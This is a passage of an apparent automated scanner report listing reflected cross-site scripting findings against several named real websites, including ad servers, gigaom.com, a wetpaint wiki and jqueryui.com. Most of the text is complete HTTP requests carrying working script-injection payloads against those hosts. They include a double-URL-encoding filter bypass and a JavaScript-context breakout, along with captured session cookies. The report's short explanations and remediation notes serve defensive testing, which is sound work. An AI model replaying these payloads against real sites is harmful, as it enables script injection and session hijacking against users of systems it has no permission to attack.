GET /adiframe/3.0/5132/12299067292a"><script>alert(1)</script>cdc932fa922/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55314"><script>alert(1)</script>2025c2eac3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/055314"><script>alert(1)</script>2025c2eac3c/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb5f"><script>alert(1)</script>5de7a93b83c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/2257eb5f"><script>alert(1)</script>5de7a93b83c/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499b"><script>alert(1)</script>0337affee79 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D12969215771262499b"><script>alert(1)</script>0337affee79;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
The value of the kvq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c7c"><script>alert(1)</script>73aeac3c218 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=e5c7c"><script>alert(1)</script>73aeac3c218 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 396
4.23. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e34"><script>alert(1)</script>42beed0cd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&80e34"><script>alert(1)</script>42beed0cd1e=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 399
The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d970%3balert(1)//85e58cc1d4b was submitted in the var parameter. This input was echoed as 5d970;alert(1)//85e58cc1d4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/ActivityServer.bs?cn=as&vn=omn&activityID=32638&advID=33048&var=s_1_Integrate_Eyeblaster_ACM_get_05d970%3balert(1)//85e58cc1d4b&rnd=9155849178792 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.rackspace.com/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 06-May-2011 10:21:35 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 05 Feb 2011 15:21:35 GMT Connection: close Content-Length: 89
var s_1_Integrate_Eyeblaster_ACM_get_05d970;alert(1)//85e58cc1d4b = {"errorCode": "nc" };
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 286b8<script>alert(1)</script>b7b9580d4d was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_1&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d&xy=251%2C232&wh=985%2C1012&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3D12D8119D7E0EE9993CA5854A82CAC7; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 137 Date: Sat, 05 Feb 2011 15:59:37 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d");
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23d7a'><script>alert(1)</script>6c3841f6dc1 was submitted in the REST URL parameter 4. This input was echoed as 23d7a\'><script>alert(1)</script>6c3841f6dc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/06/22/cloud-computing23d7a'><script>alert(1)</script>6c3841f6dc1/ HTTP/1.1 Host: gigaom.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Date: Sat, 05 Feb 2011 15:28:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Cookie X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://gigaom.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 15:28:08 GMT Cache-Control: no-cache, must-revalidate, max-age=60 Pragma: no-cache Content-Length: 82472
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 was submitted in the REST URL parameter 2. This input was echoed as 6860c<script>alert(1)</script>e2410f7e441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/ellerburnes6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:22 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui7tLDEkikBLW; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=CA2FCF825EAEF0C3F31FF2BEAE557522; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:22 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24947
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 was submitted in the REST URL parameter 2. This input was echoed as ae99d<script>alert(1)</script>3618331fda0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/heidiannaae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:28 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui+hCCPQX9ohd; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=BE9914FABF088BEA75986B4ACEE64FA4; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:28 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24940
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 was submitted in the REST URL parameter 2. This input was echoed as b03df<script>alert(1)</script>58156201246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/scottpjb03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:07:36 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q1eFPEj9bv+7BfltWrJMEs; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=65C7BB98781E26CF5BC6008F3D3429ED; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:07:36 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 24928
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1214<a>0a9fac97bad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:04 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8B146C25F56ABEDF2E3CA5EA6487F687; Path=/ Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:59:04 GMT Vary: Accept-Encoding Content-Type: text/xml;charset=UTF-8 Content-Length: 3791
<?xml version="1.0" encoding="UTF-8"?><error status="2002985068"><message>No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad</message><stack><![CDATA[java.lang.IllegalArgumentException: No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad at java.lang.Enum.valueOf(Enum.java:196) at com.wetpaint.type.MetadataName.valueOf(MetadataName.java:3) at com.wetpaint.api.action.WikiDatumAction.executeGet(WikiDatumAction.java:39) at com.wetpaint.a ...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd697"><script>alert(1)</script>0e06b0d0009 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9cd697"><script>alert(1)</script>0e06b0d0009&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a43"><script>alert(1)</script>5df749b98b5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd86a43"><script>alert(1)</script>5df749b98b5&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4f5"><script>alert(1)</script>14b71544016 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc1a4f5"><script>alert(1)</script>14b71544016&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityO